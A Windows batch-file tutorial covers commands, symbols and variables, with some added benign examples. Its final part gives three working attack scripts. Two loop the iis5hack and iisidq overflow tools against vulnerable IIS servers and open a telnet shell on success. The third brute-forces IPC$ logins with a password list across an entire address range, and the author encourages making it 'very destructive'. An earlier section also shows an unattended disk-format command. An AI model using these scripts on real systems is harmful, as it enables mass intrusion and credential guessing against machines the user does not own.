Batch learning tutorial


Part I: special commands for batch processing

A batch file is a set of commands, written in a certain order into an executable text file with the extension .bat. These commands are collectively referred to as batch commands. I will now introduce them one by one.

1、 REM

REM is the comment command; it is generally used to annotate a program. The text after REM is neither displayed nor executed when the batch file runs. Example:
REM What you see now is a comment. This line will not be executed.
In the later examples the explanation of each line is written after REM; please pay attention to this.


2、 ECHO

ECHO is the echo command; its main parameters are OFF and ON. In general, ECHO message is used to display a specific message. Example:
echo off
REM the line above turns echo off, so the commands executed from here on are not displayed
echo This is the message.
REM the line above displays the text "This is the message."
Execution result:
This is the message.


3、 GOTO

GOTO means jump. In a batch file a label is created with ":xxx", and GOTO label then continues execution directly at the command after that label. Example:
goto label
echo This line is skipped, because GOTO jumped over it
:label
REM the line above is the label named label
REM execution continues here, with the commands that follow the label


4、 CALL

CALL calls another batch file from within a running batch file; when the called batch finishes, execution of the original batch continues. (Without CALL, running 2.bat from 1.bat hands control over permanently and the rest of 1.bat never runs.) Example:
Batch file 2.bat contains:
echo This is the content of 2
Batch file 1.bat contains:
echo This is the content of 1
call 2.bat
echo The contents of 1 and 2 have all been displayed
Running 1.bat gives:
This is the content of 1
This is the content of 2
The contents of 1 and 2 have all been displayed


5、 PAUSE

PAUSE stops execution of the batch file and displays the following message until a key is pressed. Example:
pause
Press any key to continue . . .

6、 IF

IF is the conditional statement; its syntax is as follows:
IF [NOT] ERRORLEVEL number command
IF [NOT] string1==string2 command
IF [NOT] EXIST filename command
[NOT] reverses the result, i.e. "if not".
ERRORLEVEL is the exit code returned by the previously executed command.
number is an exit code in the range 0-255. IF ERRORLEVEL n is true when the exit code is greater than or equal to n, so when several exit codes are tested in sequence, the tests must be ordered from the largest number to the smallest.
string1==string2: both sides are string data and the comparison is case sensitive. The operator must be two equals signs (exact equality); when the two strings are equal, the command that follows is executed.
EXIST filename is true when the file or directory exists.
IF ERRORLEVEL must come after some command: once that command has run, IF ERRORLEVEL tests its exit code.

1、 IF [NOT] ERRORLEVEL number command
Check the exit code of the previous command and branch on it.
echo off
dir z:
REM if the exit code is 1 (unsuccessful), jump to label 1
IF ERRORLEVEL 1 goto 1
REM if the exit code is 0 (successful), jump to label 0
IF ERRORLEVEL 0 goto 0
:0
echo The command executed successfully!
REM when done, jump to label exit to leave the program
goto exit
:1
echo The command execution failed!
REM when done, jump to label exit to leave the program
goto exit
:exit
REM this is the exit of the program
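The example above only distinguishes 0 from 1. The added example below (not part of the original tutorial) shows why the descending order matters when a command has three exit codes: FIND returns 0 when a line matches, 1 when nothing matches and 2 on an error such as a missing file. The file sample.log and its two lines are constructed for the example; checking "if errorlevel 1" first would silently report a missing file as "no failed logons".

```batch
@echo off
rem Added example (not from the original tutorial): testing several exit codes
rem in descending order. FIND returns 0 when a match is found, 1 when no line
rem matches, and 2 on an error such as a file that cannot be opened.
rem Constructed sample log for this example:
> sample.log echo 10.0.0.9 logon FAILED for user bob
>> sample.log echo 10.0.0.5 logon OK for user alice

call :check sample.log
call :check missing.log
del sample.log
goto :eof

:check
find "FAILED" %1 > nul
rem Test the highest code first: "if errorlevel 1" is also true when the code is 2,
rem so testing it first would report an unreadable file as "no failed logons".
if errorlevel 2 goto err
if errorlevel 1 goto none
echo %1: failed logons found
goto :eof
:none
echo %1: no failed logons
goto :eof
:err
echo %1: could not read the file (exit code %errorlevel%)
goto :eof
```

Run it as is: the first call reports failed logons, the second reports that missing.log could not be read. Swap the two IF ERRORLEVEL lines and the second call wrongly reports "no failed logons".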
2、 IF string1==string2 command
Compare the value of a variable and branch on it.
IF %1==2 goto no
echo The variables are equal!
goto exit
:no
echo The variables are not equal
goto exit
:exit
Run it as C:\>test.bat number and compare the output for 2 and for other numbers. Note that if %1 is empty the line becomes IF ==2, which is a syntax error; write IF "%1"=="2" to be safe.

3、 IF [NOT] EXIST filename command
Look for a specific file and branch on it.
echo off
IF not EXIST autoexec.bat goto 1
echo The file exists: success!
goto exit
:1
echo The file does not exist: failure!
goto exit
:exit
Run this batch file on drive C: and on drive D: respectively to see the difference.
7、 FOR
FOR is a command that runs another command in a loop. FOR loops can also be nested; this article covers the basic usage, and nesting is explained later. Inside a batch file the syntax is:
FOR [%%c] IN (set) DO [command] [arguments]
On the command line it is:
FOR [%c] IN (set) DO [command] [arguments]
Common parameters:
/L: the set is a sequence of numbers of the form (start,step,end). So (1,1,5) generates the sequence 1 2 3 4 5 and (5,-1,1) generates the sequence 5 4 3 2 1.
/D: if the set contains wildcards, match directory names rather than file names.

/F: read data from the specified file and split each line into variables. Its options are:
eol=c - a character that marks a comment line (only one character).
skip=n - the number of lines to ignore at the beginning of the file.
delims=xxx - the set of delimiter characters. This replaces the default delimiter set of space and tab.
tokens=x,y,m-n - which tokens of each line are passed to the FOR body on each iteration. This causes additional variable names to be allocated. The m-n form is a range, from the mth to the nth token. If the last character in the tokens= string is an asterisk, one more variable is allocated and receives the remaining text of the line after the last token parsed.
usebackq - selects the alternative syntax: a back-quoted string is executed as a command, a single-quoted string is a literal string, and double quotes may be used in the file set to enclose file names that contain spaces.
Here is an example:
FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do @echo %i %j %k
Each line of myfile.txt is parsed, and lines starting with a semicolon are ignored. The second and third tokens of each line are passed to the FOR body; tokens are delimited by commas and/or spaces. Note that the FOR body references %i for the second token, %j for the third token, and %k for all remaining tokens after the third. For file names with spaces, enclose the file name in double quotes; to use double quotes this way you also need the usebackq option, otherwise the double quotes are understood as delimiting a string to parse.
%i is declared explicitly in the FOR statement, while %j and %k are declared implicitly through the tokens= option. You can specify up to 26 tokens with tokens=, as long as you do not try to declare a variable higher than the letter 'z' or 'Z'. Keep in mind that FOR variable names are case sensitive and global, and that no more than 52 can be in use at the same time.
You can also apply the FOR /F parsing logic to a string directly, by enclosing the string between the parentheses in single quotes; it is then treated as a single input line from a file. Finally, you can use FOR /F to parse the output of a command, by putting a back-quoted string between the parentheses. The string is passed as a command line to a child cmd.exe, and its output is captured in memory and parsed as if it were a file. So, for example:
FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i
enumerates the environment variable names in the current environment.
Here is a simple example showing the difference between using /L and not using it. Both commands delete the files 1.txt, 2.txt, 3.txt, 4.txt and 5.txt:
FOR /L %%F IN (1,1,5) DO DEL %%F.TXT
FOR %%F IN (1,2,3,4,5) DO DEL %%F.TXT
The two commands produce exactly the same result.
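The following added example (it is not from the original tutorial) puts the FOR /F options together on a small, constructed comma-separated logon log: eol= skips the header line, delims= and tokens= split each line into three variables, and a counter is kept with SET /A. The second loop shows usebackq on the output of a command. The file name logons.csv and its four records are made up for the example.

```batch
@echo off
rem Added example (not from the original tutorial): parsing a constructed
rem comma-separated logon log with FOR /F, then reading command output with usebackq.
rem Write the sample file; the first line is a header marked with # so eol=# skips it.
> logons.csv echo # source-ip,user,result
>> logons.csv echo 10.0.0.5,alice,OK
>> logons.csv echo 10.0.0.9,bob,FAIL
>> logons.csv echo 10.0.0.9,bob,FAIL
>> logons.csv echo 10.0.0.7,carol,OK

set fails=0
rem tokens=1,2,3 puts the three fields in %%a, %%b and %%c; delims=, splits on commas.
for /f "eol=# tokens=1,2,3 delims=," %%a in (logons.csv) do (
    if "%%c"=="FAIL" (
        echo failed logon from %%a as %%b
        set /a fails+=1
    )
)
rem %fails% is read after the loop has finished, so no delayed expansion is needed.
echo total failed logons: %fails%

rem usebackq: the back-quoted string is run as a command and its output is parsed.
rem tokens=1* gives the variable name in %%a and everything after the first = in %%b.
for /f "usebackq tokens=1* delims==" %%a in (`set PATH`) do echo name=%%a value=%%b
del logons.csv
```

Inside a batch file the loop variables are written %%a, %%b, %%c; typed directly at the prompt they would be %a, %b, %c, as the syntax lines above show.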

8、 SETLOCAL

SETLOCAL begins localization of environment changes in a batch file. Environment changes made after SETLOCAL are local to the batch file; to restore the original settings, ENDLOCAL must be executed. When the end of the batch file is reached, an implied ENDLOCAL is executed for every SETLOCAL that has not yet been ended. Example:
@echo off
set path                /* display the environment variable PATH
setlocal
set path=e:\tools       /* reset the environment variable PATH
set path
endlocal
set path
In the output you can see that the first SET PATH shows the system default path; after PATH is set to e:\tools the second shows e:\tools; and after ENDLOCAL the third shows the default path again. Even without SETLOCAL, a SET made inside a batch file only affects the command processor that ran the batch, until that window is closed; it never changes the system-wide settings.

9、 SHIFT

SHIFT lets a batch file use more than the ten replaceable parameters %0 to %9: each SHIFT moves every parameter down one position, so %1 takes the value of %2, %2 the value of %3, and so on.
ECHO %1 %2 %3 %4 %5 %6 %7 %8 %9
SHIFT
ECHO %1 %2 %3 %4 %5 %6 %7 %8 %9
SHIFT
ECHO %1 %2 %3 %4 %5 %6 %7 %8 %9
The result is as follows:
C:\>SHIFT.BAT 1 2 3 4 5 6 7 8 9 10 11
1 2 3 4 5 6 7 8 9
2 3 4 5 6 7 8 9 10
3 4 5 6 7 8 9 10 11
The above covers nine batch commands under Windows 2000.

Part II: special symbols and batch processing

Some symbols cannot be used freely on the command line, because they have special meanings.
1. Symbol (@)
In a batch file, @ suppresses echo of the current line only. We saw above that echo off turns off echo for the whole batch, but the echo off line itself is still echoed. Putting @ in front of it, as @echo off, suppresses echo of that line too, so that no command is echoed at all.
2. Symbol (>)
> means pass and overwrite. It passes the output of the command to the target that follows (a file, or a device such as the console or nul). For example, suppose file 1.txt already exists and holds a few bytes of text. Use the command:
C:\>dir *.txt > 1.txt
Afterwards the content of 1.txt is:
 Volume in drive C has no label.
 Volume Serial Number is 301A-1508
 Directory of C:\
2003-03-11 14:04 1,005 FRUNLOG.TXT
2003-04-04 16:38 18,598,494 log.txt
2003-04-04 17:02 5 1.txt
2003-03-12 11:43 0 aierrorlog.txt
2003-03-30 00:35 30,571 202.108.txt
5 File(s) 18,630,070 bytes
0 Dir(s) 1,191,542,784 bytes free
> replaces the original file contents with the output of the command.
When the output is passed to the device nul, the program shows nothing at all (note: this is a different kind of echo from echo off; echo off hides the command lines being executed, whereas this is the program's own output during and after execution):
C:\>dir *.txt > nul
The program displays nothing and leaves no trace.
3. Symbol (>>)
>> works like >, but instead of overwriting it appends the output to the end of the file; output can also be passed to the console or to a device in the same way. Example, with the same 1.txt as above:
C:\>dir *.txt >> 1.txt
Now the content of 1.txt is the text it held before, followed by:
 Volume in drive C has no label.
 Volume Serial Number is 301A-1508
 Directory of C:\
2003-03-11 14:04 1,005 FRUNLOG.TXT
2003-04-04 16:38 18,598,494 log.txt
2003-04-04 17:02 5 1.txt
2003-03-12 11:43 0 aierrorlog.txt
2003-03-30 00:35 30,571 202.108.txt
5 File(s) 18,630,070 bytes
0 Dir(s) 1,191,542,784 bytes free
>> appends the output of the command after the existing file contents instead of overwriting them.
4. Symbol (|)
| is the pipe: it passes the output of the command on its left to the command on its right as input. Example:
C:\>dir c:\ | find "1508"
 Volume Serial Number is 301A-1508
The command lists C:\ and searches the listing for the string 1508. Use find /? to see the usage of find.
This is how I format a disk without the interactive confirmation:
echo y|format a: /s /q /v:system
Anyone who has used format knows that it has an interactive confirmation step: the user is asked to type y before the command proceeds. Putting echo y in front and passing its output to format through the pipe supplies that y automatically. (This command is dangerous; be careful when testing it.)
5. Symbol (^)
^ is the escape character for the special symbols >, <, & and |. Placed in front of one of them it removes the symbol's special function, so the symbol is treated as an ordinary character. Example:
C:\>echo test ^> 1.txt
test > 1.txt
As shown, the text "test" is not written to 1.txt; instead the string test > 1.txt is displayed. This is useful when building a batch file line by line with echo, for instance over a remote shell, because the redirections in the generated lines must not act on the echo command itself.
6. Symbol (&)
& allows two or more commands on one line. The second command runs whether or not the first one succeeded. Example:
C:\>dir z:\ & dir y:\ & dir c:\
The command tries to list Z:, Y: and C: in turn, regardless of whether each drive letter exists.
7. Symbol (&&)
&& also allows two or more commands on one line, but when a command fails, the commands after it are not executed. (The complementary operator || runs the following command only when the preceding one fails.) Example:
C:\>dir z:\ && dir y:\ && dir c:\
If drive Z: exists, its listing is shown and execution continues with Y: and then C:; if it does not, the error is reported and all the following commands are skipped.
8. Symbol ("")
The " symbol allows spaces inside a string. To enter a directory whose name contains a space, any of the following can be used:
C:\>cd "Program Files"
C:\>cd progra~1
C:\>cd pro*
All three enter the Program Files directory (the second uses the 8.3 short name, the third a wildcard).
9. Symbol (,)
, is equivalent to a space: in some special cases it can be used in place of one. Example: dir,c:\ works the same as dir c:\.
10. Symbol (;)
; separates several targets for one command: they are written separately, but the effect is the same as running the command for each of them. If one target produces an error, only that error is reported and the command continues with the rest. Example:
DIR C:\;D:\;E:\;F:\
The above command is equivalent to
DIR C:\
DIR D:\
DIR E:\
DIR F:\
Of course there are other special symbols, but they are rarely used, so I will not explain them one by one here.
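The symbols in this part are most often combined when one batch file writes another. The added example below (not from the original tutorial) generates a small second batch file whose own lines contain >, | and %, which therefore have to be escaped while it is being written, and then runs it with && and ||. The file names collect.bat, temp-listing.txt and temp-count.txt are chosen for the example.

```batch
@echo off
rem Added example (not from the original tutorial): generating a second batch file
rem whose own lines contain >, | and %, then running it.
rem Inside this file ^ protects the operators so they are written out instead of
rem acting on the echo line, and %% becomes a single % in the generated file.
> collect.bat echo @echo off
>> collect.bat echo dir /b "%%TEMP%%" ^> temp-listing.txt
>> collect.bat echo type temp-listing.txt ^| find /c /v "" ^> temp-count.txt
>> collect.bat echo type temp-count.txt
echo --- generated file ---
type collect.bat
echo --- running it ---
rem && runs the next command only when the previous one succeeded, || only when it failed.
call collect.bat && echo collect.bat succeeded || echo collect.bat failed
del collect.bat temp-listing.txt temp-count.txt 2> nul
```

The generated file lists the temporary directory into temp-listing.txt, counts its lines with find /c /v "" (the empty search string with /v matches every line) and prints the count. The type collect.bat line lets you verify that the file contains plain > and | and a single %TEMP%.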

Part III: batch processing and variables

Proper use of variables in a batch file makes your program much more widely usable. A batch file can handle ten replaceable parameters at a time, %0 to %9, where %0 holds the batch file name by default. Only the SHIFT command moves the value of %1 into %0. If we add %0 to the ECHO lines of the SHIFT example above, the result is as follows:
C:\>SHIFT.BAT 1 2 3 4 5 6 7 8 9 10 11
SHIFT.BAT 1 2 3 4 5 6 7 8 9
1 2 3 4 5 6 7 8 9 10
2 3 4 5 6 7 8 9 10 11
How does the system tell the parameters apart? By the spaces in the command line: whatever comes before a space is one parameter and whatever follows it is the next. If a parameter is a long directory name containing spaces, it must be surrounded with the double quotes described under special symbol 8 in the previous part. Example:
The batch file contains:
ECHO %~1
Enter the command:
C:\>TEST "Program Files" Program Files
Program Files
%~1 gives the parameter without its surrounding quotes; plain %1 would print "Program Files" including the quotes. Without the quotes on the command line, %1 would only have been Program and %2 Files.
In a complex batch file more than ten values may be needed at the same time, which conflicts with the ten-parameter rule. How can this be solved? The system also has environment variables (the SET command shows the environment variables of the current system), for example the current system directory is %windir% or %systemroot%. When more than ten parameters are used at the same time, we can save some of them as environment variables for later use. For example, set a=%1 creates a new environment variable a, which is referenced as %a%. Environment variables are not affected by SHIFT; to change one, it must be set again. We can also pass values from one variable to another. Here is an example; the batch file is:
@echo off
set pass=%1                     /* save %1 (the first parameter) in the environment variable PASS
shift
set pass1=%1                    /* after one SHIFT, %1 is the original %2: save it in PASS1
shift
ECHO %PASS% %PASS1% %1 %2 %3 %4 %5 %6 %7 %8 %9
shift
ECHO %PASS% %PASS1% %9
set pass=%pass1%                /* pass the variables along: PASS takes the value of PASS1,
set pass1=%9                    /* and PASS1 takes the value of %9
ECHO %PASS% %PASS1%
Use the command: C:\>test a b 3 4 5 6 7 8 9 10 k l
a b 3 4 5 6 7 8 9 10 k          /* note: this line shows 11 values
a b l                           /* %9 has become l after three SHIFTs
b l                             /* the result of passing the variables along
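When the number of parameters is not known in advance, the usual pattern is to loop with SHIFT until %1 is empty, rather than naming %1 to %9. The added example below (not from the original tutorial) walks through every argument this way, counts them with SET /A, and shows the difference between %1 and %~1 for a quoted argument. The file name args.bat is chosen for the example.

```batch
@echo off
rem Added example (not from the original tutorial): walk through every argument,
rem however many there are, by looping with SHIFT instead of naming %1..%9.
rem Run as: args.bat one "two words" three four five six seven eight nine ten eleven
set count=0
:next
if "%~1"=="" goto done
set /a count+=1
rem %~1 strips surrounding quotes, so "two words" is shown without them;
rem %1 keeps them, which matters when the value is passed on to another command.
echo argument %count% is [%~1] (raw: %1)
shift
goto next
:done
echo %count% arguments processed
```

The test "%~1"=="" uses %~1 rather than %1 so that a quoted empty argument ("") also ends the loop instead of producing a syntax error.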

Part IV: complete case

These are some of the uses of batch processing. Now let us combine them and analyse in detail some batch files published on the Internet, to see how they work. I will give three examples. My comments are added after /* on each line, so that the program stays readable; /* is not batch syntax, so strip everything from /* onwards before running a listing.
Example 1
This example uses iis5hack.exe to batch overflow hosts that have the .printer vulnerability. The programs used are iis5hack.exe and telnet.exe. The command format of iis5hack is:
iis5hack <target IP> <web port> <target version> <shell port>
where target version is one of the ten numbers 0-9, each corresponding to a language and service pack version of the system. The command format for our batch file is iis.bat <target IP> [starting version number]; the starting version number is optional. The program is as follows.
@echo off                             /* turn off command echo
if "%1"=="" goto help                 /* if %1 (the target IP) is empty, show the help
if "%2"=="1" goto 1                   /* %2 is the optional starting version number;
if "%2"=="2" goto 2                   /* if it is given, start from the matching label
if "%2"=="3" goto 3
if "%2"=="4" goto 4
if "%2"=="5" goto 5
if "%2"=="6" goto 6
if "%2"=="7" goto 7
if "%2"=="8" goto 8
if not exist iis5hack.exe goto file   /* if iis5hack.exe is not found, run the file section
ping %1 -n 1 | find "Received = 1"    /* ping the target once and look for "Received = 1" in the output
if errorlevel 1 goto error            /* exit code 1 means the string was not found: run the error section (1: not found, 0: found)
iis5hack %1 80 9 88 | find "good"     /* try type 9 against web port 80 with shell port 88; "good" appears in the output only when the overflow succeeds
if not errorlevel 1 goto telnet       /* no exit code 1 means "good" was found (overflow succeeded): run the telnet section
echo Operating system type 9 failed!  /* otherwise report the failure
:8                                    /* the sections below repeat the same steps for types 8 down to 0
iis5hack %1 80 8 88 | find "good"
if not errorlevel 1 goto telnet
echo Operating system type 8 failed!
:7
iis5hack %1 80 7 88 | find "good"
if not errorlevel 1 goto telnet
echo Operating system type 7 failed!
:6
iis5hack %1 80 6 88 | find "good"
if not errorlevel 1 goto telnet
echo Operating system type 6 failed!
:5
iis5hack %1 80 5 88 | find "good"
if not errorlevel 1 goto telnet
echo Operating system type 5 failed!
:4
iis5hack %1 80 4 88 | find "good"
if not errorlevel 1 goto telnet
echo Operating system type 4 failed!
:3
iis5hack %1 80 3 88 | find "good"
if not errorlevel 1 goto telnet
echo Operating system type 3 failed!
:2
iis5hack %1 80 2 88 | find "good"
if not errorlevel 1 goto telnet
echo Operating system type 2 failed!
:1
iis5hack %1 80 1 88 | find "good"
if not errorlevel 1 goto telnet
echo Operating system type 1 failed!
iis5hack %1 80 0 88 | find "good"
if not errorlevel 1 goto telnet
echo Operating system type 0 failed!
goto error
:telnet
telnet %1 88                          /* connect to port 88 of the target IP
goto exit                             /* when the connection ends, go to the exit section
:error                                /* the error section shows help after a failure
echo Could not reach the target, or the vulnerability has been fixed! Please try manually with the following format:
echo iis5hack [target IP] [web port] [system type] [shell port]
echo Chinese: 0
echo Chinese + SP1: 1
echo English: 2
echo English + SP1: 3
echo Japanese: 4
echo Japanese + SP1: 5
echo Korean: 6
echo Korean + SP1: 7
echo Mexican: 8
echo Mexican + SP1: 9
goto exit                             /* go to the exit section
:file                                 /* the file section reports that the program was not found
echo File iis5hack.exe not found! The program stops here!
goto exit                             /* go to the exit section
:help                                 /* the help section shows how to use this batch file
echo Usage of this program:
echo iis [target IP]
echo iis [target IP] [starting number 9-0]
:exit                                 /* the exit section is the end of the program
This batch file has essentially no loop: it runs straight through from top to bottom, which is why the code is long and repetitive.
Example 2
This example uses iisidq.exe to batch overflow machines that have the .idq vulnerability. The programs used are iisidq.exe and telnet.exe. The usage of iisidq.exe is:
iisidq <operating system type> <target IP> <web port> 1 <shell port> [<command>]
If the command parameter is omitted, it defaults to cmd.exe.
The operating system type code ranges from 0 to 14. The command format for the batch file is idq.bat <target IP>. The program is as follows:
@echo off                              /* as in example 1
if not exist iisidq.exe goto file      /* as in example 1
if "%1"=="" goto error                 /* as in example 1
ping %1 -n 1 | find "Received = 1"     /* as in example 1
if errorlevel 1 goto error1            /* as in example 1
set b=%1                               /* create the environment variable b and copy %1 into it; b is the target IP from here on
set a=0                                /* create the environment variable a and set it to 0; a is the counter that drives the loop
:no                                    /* start of the "no" section
if %a%==0 set d=0                      /* when the counter a is 0, create the environment variable d and set it to 0
if %a%==1 set d=1                      /* d is the operating system type code passed to iisidq;
if %a%==2 set d=2                      /* it is selected by the counter
if %a%==3 set d=3
if %a%==4 set d=4
if %a%==5 set d=5
if %a%==6 set d=6
if %a%==7 set d=7
if %a%==9 set d=9
if %a%==10 set d=13
if %a%==11 set d=14
goto 0                                 /* after the variables are set, run the section at label 0
:1                                     /* reached when an attempt did not produce "good"
echo Executing item %d%: cannot connect to target %b%, please wait, trying again
:0                                     /* start of section 0
iisidq %d% %b% 80 1 99 | find "good"   /* send the overflow in the documented format and look for "good" in the result
if errorlevel 1 goto 1                 /* no "good" string means the attempt was not accepted: jump to label 1 and try again
ping -n 8 127.0.0.1 > nul              /* ping yourself 8 times as a delay of about 8 seconds, without showing the output
echo Executing item %d%!               /* report which operating system type was overflowed
telnet %b% 99                          /* connect to the shell port
echo.                                  /* print a blank line
if %d%==14 goto error1                 /* type 14 is the last one: leave the loop through error1
if %d%==13 set a=11                    /* otherwise advance the counter according to the current type code
if %d%==9 set a=10
if %d%==7 set a=9
if %d%==6 set a=7
if %d%==5 set a=6
if %d%==4 set a=5
if %d%==3 set a=4
if %d%==2 set a=3
if %d%==1 set a=2
if %d%==0 set a=1
goto no                                /* counter advanced: back to the "no" section
:file                                  /* the following sections are the messages shown after an error
echo iisidq.exe was not found! Put it in the same directory as this batch file!
goto exit
:error
echo Error! The target IP was not recognized! Please use the following format:
echo idq [target IP]
goto exit
:error1
echo Connection failed! The target may have fixed the vulnerability, or there is a network fault!
echo Please try it manually with the following format!
echo iisidq [target type] [target IP] [target port] [connection mode] [shell port]
echo telnet [target IP] [shell port]
:exit                                  /* the exit of the whole program
This batch file is built around a loop driven by a counter: once you understand how the counter is advanced, you understand the whole batch. Note that, as listed, a failed attempt jumps to label 1 and retries the same type code; the counter only advances on the success path, so against a host that never answers "good" the loop does not end on its own and must be stopped with Ctrl-C.
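The two ladders of IF lines in example 2 exist only because the counter is advanced by hand. The added example below (not from the original tutorial, and not using its tools) keeps the same control flow, a type code that counts from 0 to 14 and a loop that stops as soon as "good" is seen, but advances the counter with SET /A and guards the loop with one comparison. The :probe label is a harmless stand-in for the overflow tool, constructed to print "good" only for type 4 so that the loop has something to find; the file probe.out is chosen for the example. The probe output goes through a file rather than a pipe because a label cannot be called inside a pipe, which runs in a child cmd.exe without the batch file's context.

```batch
@echo off
setlocal
rem Added example (not from the original tutorial or its tools): the same
rem control flow as example 2, but the counter is advanced with SET /A and the
rem loop guard is one comparison, instead of two ladders of IF lines.
rem :probe is a harmless stand-in for the overflow tool; it is constructed to
rem print "good" only for type code 4, so the loop has something to find.
set found=
set type=0
:loop
if %type% gtr 14 goto done
call :probe %type% > probe.out
find "good" probe.out > nul
if not errorlevel 1 (
    set found=%type%
    goto done
)
echo type %type% failed
set /a type+=1
goto loop
:done
del probe.out
if defined found (echo succeeded with type %found%) else (echo no type 0-14 worked)
endlocal
goto :eof

:probe
rem stand-in: pretend that only type 4 is accepted by the target
if "%1"=="4" (echo good) else (echo nothing)
goto :eof
```

Because the guard is if %type% gtr 14, the loop also terminates when no type is accepted, which the hand-advanced version in example 2 does not guarantee.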
Example 3
for /l %%a in (0,1,255) do for /l %%b in (0,1,255) do for /l %%c in (1,1,254) do for /f "tokens=1,2*" %%e in (userpass.txt) do net use \\%1.%%a.%%b.%%c\ipc$ %%e /u:%%f
The above is a single command, and you can see that it nests four FOR loops. Usage: C:\>test.bat 218. After 218 is entered, the first FOR gives %%a its starting value 0, the second FOR gives %%b its starting value 0, the third FOR gives %%c its starting value 1, and the last FOR reads userpass.txt, taking the first token of each line as the password %%e and the second token as the user name %%f, and then runs the command. Substituting those values, with password 123 and user name abc, the command that actually runs is:
net use \\218.0.0.1\ipc$ 123 /u:abc
Of course, some friends may say that this example is too simple and inflexible. I have made some changes to it (see IPC.bat on the accompanying disc for the complete file) for interested friends to study. The modified program can scan flexibly from a starting IP to an ending IP that you specify, or from a starting IP to the maximum. The function can be strengthened further; how far depends on you, and whether it becomes a new tool.
The loops are rather heavy, mainly because of the trouble of substituting the IP numbers, but there is no other way. I will not comment this batch file line by line; read the material above carefully and you will understand it soon. Do not say it is hard to understand! At least this is a batch file that can detect weak passwords without any third-party tool, and a small change to it is still very destructive. Under Windows 2000 and XP the biggest advantage is that it is a single batch file with no false alarms; the disadvantage is that it takes far too long. Two practical notes: as written, nothing is recorded, since a successful net use simply leaves an authenticated session open on the target, so to keep the result the command would have to be followed by && echo ... >> somefile and a net use ... /delete; and every failed attempt is a logon failure on the target, so account lockout policies will stop it very quickly and it is extremely noisy in the target's logs.

PS: it is better not to learn this before learning programming. Although batch is not programming proper, it carries the ideas of programming.